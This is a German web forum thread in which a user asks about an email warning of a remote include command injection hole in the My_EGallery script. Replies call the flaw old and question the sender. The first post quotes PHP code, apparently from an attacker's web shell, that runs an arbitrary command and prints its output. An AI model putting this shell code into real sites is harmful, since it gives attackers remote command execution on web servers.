| (Web-) Design und webbasierte Sprachen Tipps & Tricks, Designabgleich, HTML & Javascript, Flash, ASP, PHP, Perl/CGI... |
Diskussion: Sicherheitslücke in My_EGallery ? im Forum (Web-) Design und webbasierte Sprachen, in der Kategorie Web, Network & Multimedia Palace; Anzeige hi ich hab heute eine e-mail bekommen von jemandem der behauptet dass My_EGallery eine Sicherheitslücke hat. er hat gesagt, ...
![]() |
| | #1 (permalink) |
| Registriert seit: 20.11.05 ![]() Likes: 0 | Anzeige hi ich hab heute eine e-mail bekommen von jemandem der behauptet dass My_EGallery eine Sicherheitslücke hat. er hat gesagt, dass die lücke ein "Remote Include Command Injection" ist. und ich musste ne Update für den script von My_EGallery machen, oder den Fehler korrigieren. Code: > <?
> // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
> if (isset($chdir)) @chdir($chdir);
> ob_start();
> execute("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
> $output = ob_get_contents();
> ob_end_clean();
> print_output();
> ?> Danke schon mal für die Antwort ! |
| | |
| | #2 (permalink) |
| Registriert seit: 17.03.04 ![]() Likes: 2 | Hallo, es gibt Sicherheitslücken bei My_EGallery, aber diese, habe ich nicht gefunden. Der Code den Du gepostet hast, ist das der Code den Du einbauen solltest? Kennst Du die Person die Dir die EMail-Adresse gesendet hast? Schau doch mal bei Heise-Security vorbei!
__________________ Mfg Basic Avid - Use it or be used! - |
| | |
| HaBOT | - Anzeige - |
| |
| | #3 (permalink) |
| Themenstarter Registriert seit: 20.11.05 ![]() Likes: 0 | danke BasicAvid für die Antwort. die Sache ist schon gereglt. ich hab in einem nuke-forum gefragt. die sagen dass das Fehler seit 2 Jahren nicht mehr gibt. ich wusste auch nicht, was ich mit dem Code machen soll ![]() und die Person die mir die e-mail gesendet hat, hat sich als "white Hacker" vorgestellt. |
| | |
| | #4 (permalink) | |
| Administrator ![]() Registriert seit: 02.10.01 ![]() ![]() Likes: 30 | Zitat:
__________________ RL sux big time... auch 2012! Deleting pr0n is like killing your best friend [HaBo] bei Facebook - Werde Fan | |
| | |
![]() |
| - Anzeige - | |
| |
| Themen-Optionen | |
| Ansicht | |
| |
Ähnliche Themen | ||||
| Thema | Autor | Forum | Antworten | Letzter Beitrag |
| sicherheitslücke in norton? | obispo | (In)security allgemein | 6 | 01.11.05 22:35 |
| Potentielle Sicherheitslücke in Mac OS 10.4 | mise | Mac OS & Co. | 4 | 11.05.05 19:51 |
| Sicherheitslücke | fux0red | Virenschutz · Tools & Aggressive Software | 15 | 23.05.04 00:02 |
| Sicherheitslücke in PGP | Tec | News & Ankündigungen | 0 | 07.09.02 03:39 |